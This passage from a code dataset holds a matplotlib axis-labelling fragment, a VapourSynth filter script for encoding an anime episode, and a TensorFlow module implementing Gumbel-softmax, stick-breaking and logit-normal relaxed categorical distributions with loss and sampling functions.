ax[3,0].set_ylabel(\"Pi4\")\n ax[4,0].set_ylabel(\"Pi5\")\n ax[5,0].set_ylabel(\"Pi6\")\n ax[6,0].set_ylabel(\"Pi7\")\n\n ax[6,0].set_xlabel(\"Pi1\")\n ax[6,1].set_xlabel(\"Pi2\")\n ax[6,2].set_xlabel(\"Pi3\")\n ax[6,3].set_xlabel(\"Pi4\")\n ax[6,4].set_xlabel(\"Pi5\")\n ax[6,5].set_xlabel(\"Pi6\")\n ax[6,6].set_xlabel(\"Pi7\")\n\n\n\n","sub_path":"applications/empirical_analysis_core/pi_to_pi.py","file_name":"pi_to_pi.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608640676","text":"import os\nfrom pathlib import Path\nfrom typing import Tuple, Union\n\nimport vapoursynth as vs\nfrom lvsfunc.misc import source\nfrom vardautomation import FileInfo, PresetAAC, PresetWEB, VPath\n\nfrom project_module import encoder as enc\nfrom project_module import flt # noqa\n\ncore = vs.core\n\nmake_wraw: bool = False # Create a workraw\nenc_type = 'Premux' if not make_wraw else 'wraw'\n\nEP_NUM = __file__[-5:-3]\n\n\nshader_file = 'assets/FSRCNNX_x2_56-16-4-1.glsl'\nif not Path(shader_file).exists():\n hookpath = r\"mpv/shaders/FSRCNNX_x2_56-16-4-1.glsl\"\n shader_file = os.path.join(str(os.getenv(\"APPDATA\")), hookpath)\n\n\n# Sources\nJP_clip = FileInfo(f'sources/{EP_NUM}/[NC-Raws] 迦希女王不会放弃! - {EP_NUM} [B-Global][WEB-DL][1080p][AVC AAC][Multiple Subtitle][MKV].mkv', # noqa\n idx=lambda x: source(x, force_lsmas=True, cachedir=''),\n preset=[PresetWEB, PresetAAC])\nJP_clip.name_file_final = VPath(f\"{enc_type.lower()}/Jahy_{EP_NUM} ({enc_type}).mkv\")\nJP_clip.name_clip_output = VPath(JP_clip.name + '.265')\nJP_clip.do_qpfile = True\n\n\ndef filterchain() -> Union[vs.VideoNode, Tuple[vs.VideoNode, ...]]:\n \"\"\"Regular VapourSynth filterchain\"\"\"\n import havsfunc as haf\n import lvsfunc as lvf\n import vardefunc as vdf\n from adptvgrnMod import adptvgrnMod\n from ccd import ccd\n from muvsfunc import SSIM_downsample\n from vsutil import depth, get_y, iterate\n from xvs import WarpFixChromaBlend\n\n src = JP_clip.clip_cut.std.AssumeFPS(fpsnum=24000, fpsden=1001)\n src = depth(src, 16)\n\n # TO-DO: Figure out how they post-sharpened it. Probably some form of unsharpening?\n src_y = depth(get_y(src), 32)\n descale = lvf.kernels.Bicubic(b=0, c=3/4).descale(src_y, 1440, 810)\n double = vdf.scale.nnedi3cl_double(descale, pscrn=1)\n rescale = depth(SSIM_downsample(double, 1920, 1080), 16)\n scaled = vdf.misc.merge_chroma(rescale, src)\n\n denoise_ref = core.dfttest.DFTTest(scaled, sigma=1.8)\n denoise = lvf.denoise.bm3d(scaled, sigma=[0.75, 0.65], ref=denoise_ref)\n cdenoise = ccd(denoise, threshold=3, matrix='709')\n decs = vdf.noise.decsiz(cdenoise, sigmaS=4, min_in=208 << 8, max_in=232 << 8)\n\n # Dehalo fuckery. Fuck the sharpening, dude\n dehalo = haf.YAHR(decs, blur=2, depth=32)\n dehalo_2 = lvf.dehalo.masked_dha(dehalo, ry=2.5, rx=2.5)\n halo_mask = lvf.mask.halo_mask(decs, rad=3, brz=0.3, thma=0.42)\n dehalo_masked = core.std.MaskedMerge(decs, dehalo_2, halo_mask)\n dehalo_min = core.std.Expr([dehalo_masked, decs], \"x y min\")\n\n # Brightening the lines to undo the unsharpening's line darkening\n bright = haf.FastLineDarkenMOD(dehalo_min, strength=-24)\n\n # AA\n baa = lvf.aa.based_aa(bright, str(shader_file))\n sraa = lvf.sraa(bright, rfactor=1.45)\n clmp = lvf.aa.clamp_aa(bright, baa, sraa, strength=1.45)\n\n line_mask = core.std.Prewitt(clmp)\n cwarp = WarpFixChromaBlend(clmp, thresh=96, depth=6)\n cwarp = core.std.MaskedMerge(cwarp, clmp, line_mask)\n\n upscale = lvf.kernels.Bicubic(b=0, c=3/4).scale(descale, 1920, 1080)\n credit_mask = lvf.scale.descale_detail_mask(src_y, upscale, threshold=0.08)\n credit_mask = iterate(credit_mask, core.std.Deflate, 3)\n credit_mask = iterate(credit_mask, core.std.Inflate, 3)\n credit_mask = iterate(credit_mask, core.std.Maximum, 2)\n merge_credits = core.std.MaskedMerge(cwarp, src, depth(credit_mask, 16))\n\n deband = flt.masked_f3kdb(merge_credits, rad=15, thr=20, grain=[12, 0])\n grain: vs.VideoNode = adptvgrnMod(deband, seed=42069, strength=0.15, luma_scaling=10,\n size=1.25, sharp=70, static=True, grain_chroma=False)\n\n return grain\n\n\ndef wraw_filterchain() -> vs.VideoNode:\n \"\"\"Workraw filterchain with minimal filtering\"\"\"\n from debandshit.debanders import dumb3kdb\n from vsutil import depth\n\n src: vs.VideoNode = JP_clip.cut\n src = depth(src, 16)\n\n deband = dumb3kdb(src, radius=16, threshold=30, grain=16)\n grain: vs.VideoNode = core.grain.Add(deband, 0.15)\n\n return grain\n\n\nif __name__ == '__main__':\n FILTERED = filterchain() if not make_wraw else wraw_filterchain()\n enc.Encoder(JP_clip, FILTERED).run(wraw=make_wraw, make_comp=False, clean_up=True, ep_num=EP_NUM) # type: ignore\nelif __name__ == '__vapoursynth__':\n FILTERED = filterchain()\n if not isinstance(FILTERED, vs.VideoNode):\n for i, CLIP_FILTERED in enumerate(FILTERED, start=1):\n CLIP_FILTERED.set_output(i)\n else:\n FILTERED.set_output(1)\nelse:\n JP_clip.clip_cut.set_output(0)\n # FILTERED = pre_freeze()\n FILTERED = filterchain() if not make_wraw else wraw_filterchain()\n if not isinstance(FILTERED, vs.VideoNode):\n for i, clip_filtered in enumerate(FILTERED, start=1):\n if clip_filtered:\n clip_filtered.set_output(i)\n else:\n FILTERED.set_output(1)\n","sub_path":"[GJM]/Completed/Jahy-sama wa Kujikenai/jahy_11.py","file_name":"jahy_11.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190946191","text":"# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\nimport numpy as np\nimport tensorflow as tf\nfrom functools import partial\nfrom typing import Tuple, List\nfrom os import environ as os_env\nos_env['TF_CPP_MIN_LOG_LEVEL'] = '2'\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n\n\nclass Distributions:\n\n def __init__(self, batch_size: int, categories_n: int, sample_size: int = 1, num_of_vars: int = 1,\n noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32), threshold: float = 0.99):\n\n self.noise_type = noise_type\n self.threshold = threshold\n self.temp = temp\n self.batch_size = batch_size\n self.categories_n = categories_n\n self.sample_size = sample_size\n self.num_of_vars = num_of_vars\n\n self.epsilon = tf.constant(0., dtype=tf.float32)\n self.sigma = tf.constant(0., dtype=tf.float32)\n self.delta = tf.constant(0., dtype=tf.float32)\n self.kappa = tf.constant(0., dtype=tf.float32)\n self.n_required = categories_n\n self.psi = tf.constant(0., dtype=tf.float32)\n\n self.truncation_option = 'quantile'\n self.quantile = 70\n self.log_q_psi = tf.constant(0., dtype=tf.float32)\n\n def broadcast_params_to_sample_size(self, params: list):\n params_broad = []\n for param in params:\n shape = (self.batch_size, self.categories_n, self.sample_size, self.num_of_vars)\n param_w_samples = tf.broadcast_to(input=param, shape=shape)\n params_broad.append(param_w_samples)\n return params_broad\n\n def sample_noise(self, shape) -> tf.Tensor:\n if self.noise_type == 'normal':\n epsilon = tf.random.normal(shape=shape)\n elif self.noise_type == 'trunc_normal':\n epsilon = tf.random.truncated_normal(shape=shape)\n elif self.noise_type == 'gamma':\n epsilon = tf.random.gamma(shape=shape, alpha=1., beta=1.)\n elif self.noise_type == 'cauchy':\n epsilon = tf.constant(np.random.standard_cauchy(size=shape), dtype=tf.float32)\n else:\n raise RuntimeError\n return epsilon\n\n def perform_truncation_via_threshold(self, vector):\n vector_cumsum = tf.math.cumsum(x=vector, axis=1)\n larger_than_threshold = tf.where(condition=vector_cumsum <= self.threshold)\n if self.truncation_option == 'quantile':\n self.n_required = int((np.percentile(larger_than_threshold[:, 1] + 1, q=self.quantile)))\n elif self.truncation_option == 'max':\n self.n_required = (tf.math.reduce_max(larger_than_threshold[:, 1]) + 1).numpy()\n else:\n self.n_required = (tf.math.reduce_mean(larger_than_threshold[:, 1]) + 1).numpy()\n\n def subset_variables_to_n_required(self, epsilon, sigma, delta, kappa):\n self.epsilon = epsilon[:, :self.n_required, :]\n self.sigma = sigma[:, :self.n_required, :]\n self.delta = delta[:, :self.n_required, :]\n self.kappa = kappa[:, :self.n_required, :]\n\n\nclass GaussianSoftmaxDist(Distributions):\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, noise_type: str = 'normal', sample_size: int = 1,\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32)):\n super().__init__(batch_size=mu.shape[0], categories_n=mu.shape[1], sample_size=sample_size,\n noise_type=noise_type, temp=temp, num_of_vars=mu.shape[3])\n\n self.mu = mu\n self.xi = xi\n self.lam = tf.constant(0., dtype=tf.float32)\n self.psi = tf.constant(0., dtype=tf.float32)\n self.log_psi = tf.constant(0., dtype=tf.float32)\n\n def do_reparameterization_trick(self):\n mu_broad, xi_broad = self.broadcast_params_to_sample_size(params=[self.mu, self.xi])\n epsilon = self.sample_noise(shape=mu_broad.shape)\n sigma = convert_ξ_to_σ(ξ=xi_broad,)\n self.lam = (mu_broad + sigma * epsilon) / self.temp\n self.log_psi = self.lam - tf.math.reduce_logsumexp(self.lam, axis=1, keepdims=True)\n self.psi = self.project_to_vertices()\n\n def project_to_vertices(self):\n psi = project_to_vertices_via_softmax_pp(self.lam)\n # psi = tf.math.softmax(self.lam, axis=1)\n return psi\n\n\nclass IsoGauSoftMax(Distributions):\n def __init__(self, mu: tf.Tensor, noise_type: str = 'normal', temp: tf.Tensor = tf.constant(0.1),\n sample_size: int = 1):\n super().__init__(batch_size=mu.shape[0], categories_n=mu.shape[1], noise_type=noise_type, temp=temp,\n sample_size=sample_size, num_of_vars=mu.shape[3])\n\n self.mu = mu\n self.lam = tf.constant(0., dtype=tf.float32)\n self.psi = tf.constant(0., dtype=tf.float32)\n\n def do_reparameterization_trick(self):\n mu_broad = self.broadcast_params_to_sample_size(params=[self.mu])[0]\n epsilon = self.sample_noise(shape=mu_broad.shape)\n self.lam = (mu_broad + epsilon) / self.temp\n self.psi = self.project_to_vertices()\n\n def project_to_vertices(self):\n psi = tf.math.softmax(self.lam, axis=1)\n return psi\n\n\nclass GaussianSoftPlus(GaussianSoftmaxDist):\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, temp: tf.Tensor, sample_size: int = 1,\n noise_type: str = 'normal'):\n super().__init__(mu=mu, xi=xi, noise_type=noise_type, temp=temp, sample_size=sample_size)\n\n def project_to_vertices(self):\n psi = project_to_vertices_via_softplus(lam=self.lam)\n return psi\n\n\nclass CauchySoftmaxDist(GaussianSoftmaxDist):\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, noise_type: str = 'cauchy', sample_size: int = 1,\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32)):\n super().__init__(mu=mu, xi=xi, noise_type=noise_type, temp=temp, sample_size=sample_size)\n self.noise_type = 'cauchy'\n\n\nclass LogitDist(Distributions):\n\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, sample_size: int = 1, noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32), threshold: float = 0.99):\n super().__init__(batch_size=mu.shape[0], categories_n=mu.shape[1], sample_size=sample_size,\n noise_type=noise_type, temp=temp, threshold=threshold)\n\n self.mu = mu\n self.xi = xi\n self.eta = tf.constant(0., dtype=tf.float32)\n self.lam = tf.constant(0., dtype=tf.float32)\n self.projection_option = 'softmax'\n self.random_jump_threshold = 0.25\n\n def compute_log_logit_dist(self) -> tf.Tensor:\n if self.projection_option == 'softmax':\n log_q_psi = compute_log_logit_dist(epsilon=self.epsilon, sigma=self.sigma, kappa=self.kappa,\n temp=self.temp, lam=self.lam)\n else:\n log_q_psi = compute_log_logit_dist_projection(epsilon=self.epsilon, sigma=self.sigma,\n kappa=self.kappa, temp=self.temp)\n return log_q_psi\n\n def do_reparameterization_trick(self):\n # mu_broad, xi_broad = self.broadcast_params_to_sample_size(params=[self.mu, self.xi])\n # mu_broad = self.mu\n # xi_broad = self.xi\n mu_broad = self.mu[:, :, :, 0]\n xi_broad = self.xi[:, :, :, 0]\n mu_broad = tf.broadcast_to(mu_broad, shape=(self.batch_size, self.categories_n, self.sample_size))\n xi_broad = tf.broadcast_to(xi_broad, shape=(self.batch_size, self.categories_n, self.sample_size))\n epsilon = self.sample_noise(shape=mu_broad.shape)\n sigma, delta, kappa = retrieve_transformations_up_to_kappa(mu_broad=mu_broad, xi_broad=xi_broad,\n epsilon=epsilon)\n self.get_eta_and_n_required(kappa=kappa)\n self.subset_variables_to_n_required(epsilon, sigma, delta, kappa)\n if self.projection_option == 'softmax':\n # self.lam, self.psi = project_to_vertices_via_softmax(eta=self.eta, temp=self.temp)\n # self.psi = project_to_vertices_via_softmax(λ=self.lam)\n self.lam = self.eta / self.temp\n self.psi = tf.math.softmax(self.lam, axis=1)\n self.psi = tf.reshape(self.psi, shape=self.psi.numpy().shape + (1,))\n else:\n uniform_sample = tf.random.uniform(shape=(self.batch_size, self.sample_size),\n minval=0, maxval=1)\n self.lam, self.psi = project_to_vertices_via_random_jump(\n eta=self.eta, temp=self.temp, uniform_sample=uniform_sample,\n random_jump_threshold=self.random_jump_threshold)\n\n def get_eta_and_n_required(self, kappa):\n self.perform_truncation_via_threshold(vector=kappa)\n self.eta = kappa[:, :self.n_required, :]\n\n\nclass SBDist(LogitDist):\n\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, sample_size: int = 1, noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32), threshold: float = 0.99):\n super().__init__(mu=mu, xi=xi, sample_size=sample_size,\n noise_type=noise_type, temp=temp, threshold=threshold)\n\n self.run_iteratively = False\n self.log_jac = tf.constant(0., dtype=tf.float32)\n self.lower = np.zeros(shape=(self.categories_n - 1, self.categories_n - 1))\n self.upper = np.zeros(shape=(self.categories_n - 1, self.categories_n - 1))\n\n def compute_log_sb_dist(self) -> tf.Tensor:\n log_q_psi = compute_log_sb_dist(lam=self.lam, kappa=self.kappa, sigma=self.sigma,\n epsilon=self.epsilon, log_jac=self.log_jac, temp=self.temp)\n return log_q_psi\n\n def get_eta_and_n_required(self, kappa):\n if self.run_iteratively:\n self.eta, self.log_jac = self.compute_sb_and_log_jac_iteratively(κ=kappa)\n else:\n self.lower, self.upper = generate_lower_and_upper_triangular_matrices_for_sb(\n categories_n=self.categories_n, lower=self.lower, upper=self.upper,\n batch_size=self.batch_size, sample_size=self.sample_size)\n self.eta, self.log_jac = self.perform_stick_break_and_compute_log_jac(kappa=kappa)\n\n def perform_stick_break_and_compute_log_jac(self, kappa: tf.Tensor) -> Tuple[tf.Tensor, tf.Tensor]:\n accumulated_prods = accumulate_one_minus_kappa_products_for_sb(kappa=kappa, lower=self.lower,\n upper=self.upper)\n ς = 1.e-20\n eta = kappa * accumulated_prods\n self.perform_truncation_via_threshold(vector=eta)\n log_jac = -tf.reduce_sum(tf.math.log(accumulated_prods[:, :self.n_required, :] + ς), axis=1)\n return eta[:, :self.n_required, :], log_jac\n\n def compute_sb_and_log_jac_iteratively(self, κ):\n η, log_jac = iterative_sb_and_jac(κ=κ)\n self.perform_truncation_via_threshold(η)\n return η[:, :self.n_required, :], log_jac\n\n\nclass ExpGSDist(Distributions):\n\n def __init__(self, log_pi: tf.Tensor, sample_size: int = 1, noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32)):\n super().__init__(batch_size=log_pi.shape[0], categories_n=log_pi.shape[1], sample_size=sample_size,\n noise_type=noise_type, temp=temp, num_of_vars=log_pi.shape[3])\n self.log_pi = log_pi\n self.log_psi = tf.constant(value=0., dtype=tf.float32)\n\n def do_reparameterization_trick(self):\n ς = 1.e-20\n log_pi_broad = self.broadcast_params_to_sample_size(params=[self.log_pi])[0]\n uniform = tf.random.uniform(shape=log_pi_broad.shape)\n gumbel_sample = -tf.math.log(-tf.math.log(uniform + ς) + ς)\n y = (log_pi_broad + gumbel_sample) / self.temp\n self.log_psi = y - tf.math.reduce_logsumexp(y, axis=1, keepdims=True)\n self.psi = tf.math.softmax(logits=y, axis=1)\n\n\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n# Distribution functions\n# ===========================================================================================================\ndef compute_log_sb_dist(lam, kappa, sigma, epsilon, log_jac, temp: tf.Tensor):\n log_q_lam = compute_log_logit_dist(lam=lam, kappa=kappa, sigma=sigma, epsilon=epsilon, temp=temp)\n log_q_psi = log_q_lam + log_jac\n return log_q_psi\n\n\ndef compute_log_logit_dist(lam, kappa, sigma, epsilon, temp: tf.Tensor):\n n_required = epsilon.shape[1]\n log_q_kappa = compute_log_logit_normal(epsilon=epsilon, sigma=sigma, kappa=kappa)\n log_q_psi = log_q_kappa + (n_required * tf.math.log(temp) + temp * tf.math.reduce_sum(lam, axis=1))\n return log_q_psi\n\n\ndef compute_log_logit_dist_projection(kappa, sigma, epsilon, temp: tf.Tensor):\n n_required = epsilon.shape[1]\n log_q_kappa = compute_log_logit_normal(epsilon=epsilon, sigma=sigma, kappa=kappa)\n log_q_psi = log_q_kappa - n_required * tf.math.log(temp)\n return log_q_psi\n\n\ndef compute_log_logit_normal(epsilon, sigma, kappa) -> tf.Tensor:\n log_norm_cons = compute_log_logit_normal_normalizing_constant(sigma, kappa)\n log_exp_sum = -(tf.constant(value=0.5, dtype=tf.float32) * tf.reduce_sum(epsilon ** 2, axis=1))\n\n log_q_kappa = log_norm_cons + log_exp_sum\n return log_q_kappa\n\n\ndef compute_log_logit_normal_normalizing_constant(sigma, kappa) -> tf.Tensor:\n math_pi = 3.141592653589793\n ς = 1.e-20\n n_required = kappa.shape[1]\n\n constant_term = -n_required / 2 * tf.math.log(2. * math_pi)\n sigma_term = -tf.reduce_sum(tf.math.log(sigma + ς), axis=1)\n kappa_term = -(tf.reduce_sum(tf.math.log(kappa + ς), axis=1) +\n tf.reduce_sum(tf.math.log(1 - kappa + ς), axis=1))\n\n log_norm_const = constant_term + sigma_term + kappa_term\n return log_norm_const\n\n\ndef compute_log_gs_dist(psi: tf.Tensor, logits: tf.Tensor, temp: tf.Tensor) -> tf.Tensor:\n n_required = tf.constant(value=psi.shape[1], dtype=tf.float32)\n ς = tf.constant(1.e-20)\n\n log_const = tf.math.lgamma(n_required) + (n_required - 1) * tf.math.log(temp)\n log_sum = tf.reduce_sum(logits - (temp + tf.constant(1.)) * tf.math.log(psi + ς), axis=1)\n log_norm = - n_required * tf.math.log(tf.reduce_sum(tf.math.exp(logits) / psi ** temp, axis=1) + ς)\n\n log_p_concrete = log_const + log_sum + log_norm\n return log_p_concrete\n\n\ndef compute_log_exp_gs_dist(log_psi: tf.Tensor, logits: tf.Tensor, temp: tf.Tensor) -> tf.Tensor:\n categories_n = tf.constant(log_psi.shape[1], dtype=tf.float32)\n log_cons = tf.math.lgamma(categories_n) + (categories_n - 1) * tf.math.log(temp)\n aux = logits - temp * log_psi\n log_sums = tf.math.reduce_sum(aux, axis=1) - categories_n * tf.math.reduce_logsumexp(aux, axis=1)\n log_exp_gs_dist = log_cons + log_sums\n return log_exp_gs_dist\n\n\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n# Optimization functions for the Expectation Minimization Loss\n# ===========================================================================================================\ndef compute_loss(params: List[tf.Tensor], temp: tf.Tensor, probs: tf.Tensor, dist_type: str = 'sb',\n sample_size: int = 1, threshold: float = 0.99, run_iteratively=False, run_kl=True):\n chosen_dist = select_chosen_distribution(dist_type=dist_type, params=params, temp=temp,\n sample_size=sample_size, threshold=threshold,\n run_iteratively=run_iteratively)\n\n chosen_dist.do_reparameterization_trick()\n psi_mean = tf.reduce_mean(chosen_dist.psi, axis=[0, 2, 3])\n if run_kl:\n loss = psi_mean * (tf.math.log(psi_mean) - tf.math.log(probs[:chosen_dist.n_required] + 1.e-20))\n loss = tf.reduce_sum(loss)\n else:\n loss = tf.reduce_sum((psi_mean - probs[:chosen_dist.n_required]) ** 2)\n return loss, chosen_dist.n_required\n\n\ndef compute_gradients(params, temp: tf.Tensor, probs: tf.Tensor, run_kl=True,\n dist_type: str = 'sb', sample_size: int = 1, run_iteratively=False,\n threshold: float = 0.99) -> Tuple[tf.Tensor, tf.Tensor, int]:\n with tf.GradientTape() as tape:\n loss, n_required = compute_loss(params=params, temp=temp, probs=probs, sample_size=sample_size,\n threshold=threshold, dist_type=dist_type, run_kl=run_kl,\n run_iteratively=run_iteratively)\n gradient = tape.gradient(target=loss, sources=params)\n return gradient, loss, n_required\n\n\ndef apply_gradients(optimizer: tf.keras.optimizers, gradients: tf.Tensor, variables):\n optimizer.apply_gradients(zip(gradients, variables))\n\n\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n# Utils\n# ===========================================================================================================\ndef retrieve_transformations_up_to_kappa(mu_broad: tf.Tensor, xi_broad: tf.Tensor, epsilon: tf.Tensor):\n sigma = convert_ξ_to_σ(ξ=xi_broad)\n delta = mu_broad + sigma * epsilon\n kappa = tf.math.sigmoid(delta)\n return sigma, delta, kappa\n\n\ndef convert_ξ_to_σ(ξ: tf.Tensor):\n σ = tf.math.exp(ξ)\n return σ\n\n\n@tf.function\ndef project_to_vertices_via_softmax(λ):\n ς = 1.e-25\n λ_i_λ_j = λ - tf.math.reduce_max(λ, axis=1, keepdims=True)\n exp_λ = tf.math.exp(λ_i_λ_j)\n norm_λ = tf.math.reduce_sum(exp_λ, axis=1, keepdims=True)\n ψ_plus = exp_λ / (norm_λ + ς)\n return ψ_plus\n\n\n@tf.function\ndef project_to_vertices_via_softmax_pp(lam):\n offset = 1.e-1\n lam_i_lam_max = lam - tf.math.reduce_max(lam, axis=1, keepdims=True)\n exp_lam = tf.math.exp(lam_i_lam_max)\n norm_lam = tf.math.reduce_sum(exp_lam, axis=1, keepdims=True)\n aux = exp_lam / (norm_lam + offset)\n\n psi_plus = (1 - tf.math.reduce_sum(aux, axis=1, keepdims=True))\n psi = tf.concat(values=[aux, psi_plus], axis=1)\n\n return psi\n\n\ndef project_to_vertices_via_softplus(lam):\n ς = 1.e-20\n normalized_psi = tf.math.reduce_sum(tf.math.softplus(lam), axis=1, keepdims=True) + ς\n psi = tf.math.softplus(lam) / normalized_psi\n return psi\n\n\ndef project_to_vertices_via_random_jump(eta, temp: tf.Tensor, uniform_sample, random_jump_threshold):\n λ = eta\n batch_size, categories_n, sample_size = eta.shape\n ψ = tf.TensorArray(dtype=tf.float32, size=batch_size, element_shape=(categories_n, sample_size))\n # noinspection PyTypeChecker\n projection = temp * eta + (1. - temp) * project_into_simplex(eta)\n for i in tf.range(batch_size):\n if uniform_sample[i] <= random_jump_threshold:\n ψ = ψ.write(index=i, value=eta[i, :, :])\n else:\n ψ = ψ.write(index=i, value=projection[i, :, :])\n return λ, ψ.stack()\n\n\ndef project_into_simplex(vector: tf.Tensor):\n batch_size, n_required, sample_size = vector.shape\n projection = np.zeros(shape=(batch_size, n_required, sample_size))\n\n argmax_loc = np.argmax(vector.numpy(), axis=1)\n for sample in range(sample_size):\n for batch in range(batch_size):\n projection[batch, argmax_loc[batch, sample], sample] = 1.\n\n projection = tf.constant(value=projection, dtype=tf.float32)\n return projection\n\n\ndef accumulate_one_minus_kappa_products_for_sb(kappa: tf.Tensor, lower, upper) -> tf.Tensor:\n forget_last = -1\n one = tf.constant(value=1., dtype=tf.float32)\n\n diagonal_kappa = tf.linalg.diag(tf.transpose(one - kappa[:, :forget_last, :], perm=[0, 2, 1]))\n accumulation = tf.transpose(tf.tensordot(lower, diagonal_kappa, axes=[[1], [2]]),\n perm=[1, 0, 3, 2])\n accumulation_w_ones = accumulation + upper\n cumprod = tf.math.reduce_prod(input_tensor=accumulation_w_ones, axis=2)\n return cumprod\n\n\ndef generate_lower_and_upper_triangular_matrices_for_sb(categories_n, lower, upper,\n batch_size, sample_size):\n zeros_row = np.zeros(shape=categories_n - 1)\n\n for i in range(categories_n - 1):\n for j in range(categories_n - 1):\n if i > j:\n lower[i, j] = 1\n elif i == j:\n lower[i, j] = 1\n upper[i, j] = 1\n else:\n upper[i, j] = 1\n\n lower = np.vstack([zeros_row, lower])\n upper = np.vstack([upper, zeros_row])\n\n upper = np.broadcast_to(upper, shape=(batch_size, categories_n, categories_n - 1))\n upper = np.reshape(upper, newshape=(batch_size, categories_n, categories_n - 1, 1))\n upper = np.broadcast_to(upper, shape=(batch_size, categories_n, categories_n - 1, sample_size))\n lower = tf.constant(value=lower, dtype=tf.float32) # no reshape needed\n upper = tf.constant(value=upper, dtype=tf.float32)\n return lower, upper\n\n\n@tf.function\ndef iterative_sb_and_jac(κ):\n batch_size, max_size, samples_n = κ.shape\n ς = 1.e-20\n η = tf.TensorArray(dtype=tf.float32, size=max_size, element_shape=(batch_size, samples_n),\n clear_after_read=True)\n η = η.write(index=0, value=κ[:, 0, :])\n cumsum = tf.identity(κ[:, 0, :])\n next_cumsum = tf.identity(κ[:, 1, :] * (1 - κ[:, 0, :]) + κ[:, 0, :])\n jac_sum = tf.constant(value=0., dtype=tf.float32, shape=(batch_size, samples_n))\n max_iter = tf.constant(value=max_size - 1, dtype=tf.int32)\n for i in tf.range(1, max_iter):\n η = η.write(index=i, value=κ[:, i, :] * (1. - cumsum))\n jac_sum += tf.math.log(1. - cumsum + ς)\n cumsum += κ[:, i, :] * (1. - cumsum)\n next_cumsum += κ[:, i + 1, :] * (1. - next_cumsum)\n\n η = η.write(index=max_size - 1, value=κ[:, max_size - 1, :] * (1. - cumsum))\n jac_sum += tf.math.log(1. - cumsum + ς)\n return tf.transpose(η.stack(), perm=[1, 0, 2]), -jac_sum\n\n\n@tf.function\ndef compute_log_jac(κ):\n batch_size, n_required, samples_n = κ.shape\n cumsum = tf.identity(κ[:, 0, :])\n jac_sum = tf.constant(value=0., dtype=tf.float32, shape=(batch_size, samples_n))\n max_iter = tf.constant(value=n_required, dtype=tf.int32)\n for i in tf.range(1, max_iter):\n jac_sum += tf.math.log(1. - cumsum + 1.e-20)\n cumsum += κ[:, i, :] * (1. - cumsum)\n return -jac_sum\n\n\ndef generate_sample(sample_size: int, params, dist_type: str, temp, threshold: float = 0.99,\n output_one_hot=False):\n chosen_dist = select_chosen_distribution(dist_type=dist_type, threshold=threshold,\n params=params, temp=temp, sample_size=sample_size)\n categories_n = params[0].shape[1]\n chosen_dist.do_reparameterization_trick()\n if output_one_hot:\n vector = np.zeros(shape=(1, categories_n, sample_size, 1))\n n_required = chosen_dist.psi.shape[1]\n vector[:, :n_required, :, :] = chosen_dist.psi.numpy()\n return vector\n else:\n sample = np.argmax(chosen_dist.psi.numpy(), axis=1)\n return sample\n\n\ndef select_chosen_distribution(dist_type: str, params, temp=tf.constant(0.1, dtype=tf.float32),\n sample_size: int = 1, threshold: float = 0.99, run_iteratively=False):\n if dist_type == 'logit':\n # noinspection PyTypeChecker\n mu, xi = params\n chosen_dist = LogitDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size, threshold=threshold)\n elif dist_type == 'ExpGS':\n pi = params[0]\n chosen_dist = ExpGSDist(log_pi=pi, temp=temp, sample_size=sample_size)\n elif dist_type == 'IsoGauSoftMax':\n mu = params[0]\n chosen_dist = IsoGauSoftMax(mu=mu, temp=temp, sample_size=sample_size)\n elif dist_type == 'GauSoftMax':\n mu, xi, = params\n chosen_dist = GaussianSoftmaxDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size)\n elif dist_type == 'GauSoftPlus':\n mu, xi, = params\n chosen_dist = GaussianSoftPlus(mu=mu, xi=xi, temp=temp, sample_size=sample_size)\n elif dist_type == 'Cauchy':\n mu, xi, = params\n chosen_dist = CauchySoftmaxDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size)\n elif dist_type == 'sb':\n # noinspection PyTypeChecker\n mu, xi = params\n chosen_dist = SBDist(mu=mu, xi=xi, temp=temp, sample_size=sample_size, threshold=threshold)\n if run_iteratively:\n chosen_dist.run_iteratively = True\n else:\n raise RuntimeError\n\n return chosen_dist\n\n\ndef generate_samples_mp(total_samples, params, dist_type, threshold, temp, pool, output_one_hot=False):\n # TODO: correct this function\n func = partial(generate_sample, params=params, threshold=threshold,\n dist_type=dist_type, temp=temp, output_one_hot=output_one_hot)\n # noinspection 